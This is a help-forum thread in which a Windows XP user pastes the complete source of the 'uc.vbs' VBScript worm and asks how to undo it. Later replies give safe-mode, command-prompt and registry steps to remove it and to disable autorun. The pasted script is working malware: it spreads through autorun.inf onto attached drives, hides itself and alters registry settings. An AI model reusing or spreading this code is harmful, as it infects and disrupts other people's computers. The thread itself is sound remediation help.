C++/VB - Hacked by UC???

Asked By SF

21-Mar-07 04:01 AM

Hi,

I recently visited an internet shop, I downloaded some files, plug my flash
drive in to copy those download files. At home, I plug the flash drive into
my PC and transfering the files. When I start my windows xp the next day, I
cannot double click on the C: drive, it did not work (did not open). I got a
brief display of the hour glass. When I open a web page, I saw on the top a
message displaying the "Hacked by UC".

I found a script below that cause the above problem. Does this a sign of
hacking and how do I set it back to my previous windows setting?


'My name is Slow but sure V0.05
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe uc.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\uc.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\uc.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\uc.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and
flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\uc.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\uc.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\uc.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\Window Title","Hacked by UC"
rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

21-Mar-07 07:00 AM

The first thing I would do is go into regedit and delete this key:

Then delete this one:
Title"

Then delete uc.vbs from your windows folder and your flash drive.

30-Mar-07 06:11 PM

it keeps copying itself. its also in your startup and your shell so upon double clicking C: it will copy itself once more. Ive tried deleting off flash drive, c drive, even using command prompts, ive tried deleting registry keys and restarting in command prompt..i will try to restart in safe mode now

31-Mar-07 12:37 AM

Boot in safe mode, Remove (from) C:\autorun.inf, delete Registry\Software\Windows\CurrentVersion\Run\uc key, delete HKEY_CURRENT_USER\Software\Microsoft\Internet

Explorer\Main\Window Title key. Reboot.

31-Mar-07 02:24 PM

To completely remove it from your computer, restart the computer to Safe Mode (do not try to access any drive using Windows Explorer before you complete following steps):



- Go to Task Manager (Press Ctrl+Alt+del), make sure there are no process with Image Name = "wscript.exe". End the process if it is running.

- Go to command prompt, type following command:

del %systemroot%\uc.vbs

For each of the drive available on the computer, type following command in command prompt (replace <drive_name> with the drive letter):

attrib -h -s -r <drive_name>:\autorun.inf

attrib -h -s -r <drive_name>:\uc.vbs

del <drive_name>:\autorun.inf

del <drive_name>:\uc.vbs

- Remove following registry key:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\UC

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title

HKCR\vbsfile\DefaultIcon





To save yourself from similar incident again, you might want to take note of following point:



- try to use only account without admin privilege to logon to your computer and use runas to execute task that require administrator privilege)



- disable autorun on your computer (this will resulted in audio/video will not automatically play when you insert a CD/DVD/removable drive ). You can refer to following article for how to disable autorun: http://www.annoyances.org/exec/show/article03-018.

02-Apr-07 02:02 PM

i tried the abovementioned techniques for deleting this virus, and kept coming up with "file not found" when i typed commands into the command prompt.  any suggestions?

15-Oct-07 04:39 PM

Hi Julia,

I just wanted to let you know that I figured out a solution that worked for me; that is to get double-click access to my drives and get rid of 'Hacked by UC' in the IE title bar. Anyway, here are the steps I followed that got the problem fixed on my computer. However, these instructions are kind of long, so it might take awhile to get through all the steps.



One last thing before I get into the instructions to fix the problem: You might want to save this page to your hard drive, to your My Documents folder. The reason I say this is that if you have the page saved to your hard drive you will be able to view it while you are in safe-mode. Also, if you have a word processing program, such as Microsoft Word, you can copy this post and paste it into a document(and save to the My Documents folder)and that should make it a bit easier to locate this post, than if you use your web browser and open the webpage, although you can do either. (Just anything to view these instructions in safe-mode - they're quite lengthy) Well, I hope my instructions help you get that nasty problem fixed - I wish you luck!

---------------------------------------------------



If you see ‘Hacked by UC’ in the title bar of Internet Explorer, you may have noticed that you cannot open the drives in Windows Explorer by double-clicking on the drives.



If you are experiencing this problem, and you need immediate access to a drive, you can safely open it  by right-clicking on the drive you want to open, and then click Open.



The reason I say ‘safely’ is that if you double-click a drive to open it, and it doesn’t open, it runs a script in the root of that drive called ‘uc.vbs’, which is referenced in the autorun.inf file.



Now, let’s proceed to fix the problem:

(Note: Press Enter after each line, and do not type the punctuation)



1.	Restart the computer and go into safe-mode.

2.	Press Ctrl+Alt+Del to bring up the Windows   Task Manager.

3.	Click the Processes tab. Look for a process called wscript.exe, and terminate it if it’s running. There may be more than one instance of this process so be sure you terminate all of them if there’s more than one.

4.	Now you need to show the hidden files and folders, if they’re not already shown.



To do this follow these steps:

•	Open My Computer

•	Go Tools | Folder Options and click the View tab

•	Click the radio button Show Hidden Files and Folders

•	Scroll down if necessary and find the check box Hide Protected Operating System Files, and if you see a check mark remove it



5.    Open the Command Prompt

6.    Type ‘del %systemroot%\uc.vbs’. Don’t worry if you get a ‘File not found’              error

7.    Go to the root of  the C drive and  type ‘attrib –r –h –s C:\uc.vbs’

8.    Type del uc.vbs.

9.    Type attrib –r –h –s C:\autorun.inf

10.   Type del autorun.inf



Repeat steps 6 through 9 for all hard drives or hard drive partitions that you’re having trouble with, and replace C with the appropriate drive letter, and remember to press Enter after every line.



Now, Go to the Start menu, click Run, type ‘regedit’ and then click OK.



This takes you into the Registry Editor. What you’re going to do here is remove the following values from the registry:





HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\UC



HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title

HKCR\vbsfile\DefaultIcon



HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\UC



HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window

Title



When you’re finished deleting the above registry values navigate to the top of the registry, and then go Edit | Find, and then type ‘uc.vbs’. When you’re finished click Find Now.



Furthermore, don’t delete the string value itself – Here’s what I recommend:  open the string value(which is in the right pane)  and then delete everything in it, and then click OK. Press F3 when you’re ready to go to the next occurrence.



Keep doing this until you have emptied all the string values containing references to ‘uc.vbs’. When you have finished going through the whole registry, you’ll want to be sure you haven’t missed any occurrences.



Navigate back to the top of the registry and click on My Computer to highlight it. You want to be sure you’re searching the whole registry.



Now Go to the edit menu and click Find. In the text box make sure you see uc.vbs, and then click Find Next. What we’re doing is a sweep of the entire registry to make sure we have deleted every reference to uc.vbs. I’m not certain that it’s safe to delete the string value itself because I haven’t tested it, so we’re staying on the safe side.



If you come across any string value with this filename, open it, delete the contents of the string value. You can do this quickly by placing the insertion point at the beginning of the text field and then pressing Shift+End. This selects everything in the string value. Press Delete, then click OK. After you have done this press F3 to see if there are any more of these references.



After you have come to the end of the registry, navigate back to the top of the registry and then do another search. What you’re after is to go through the whole registry without finding any occurrences of uc.vbs.



When you’re finished, restart the computer.



After you’ve restarted the computer open Windows Explorer (My Computer) and then double-click on the icon for your hard drive. You should now be in your hard drive’s directory.



Well, you’re all finished! That was quite a journey, but if you did everything correctly I believe that you will again have double-click access to your drives as well as be rid of  ‘Hacked by UC’ in the IE title bar.

07-Oct-10 09:41 AM

Hi all



I hope someone can help me please. I am having a similar problem, however it states Hacked by ( my Computor name) in the IE title bar. I have gong through these steps and have not been able to find a solution to this.



Many thanks



Trevor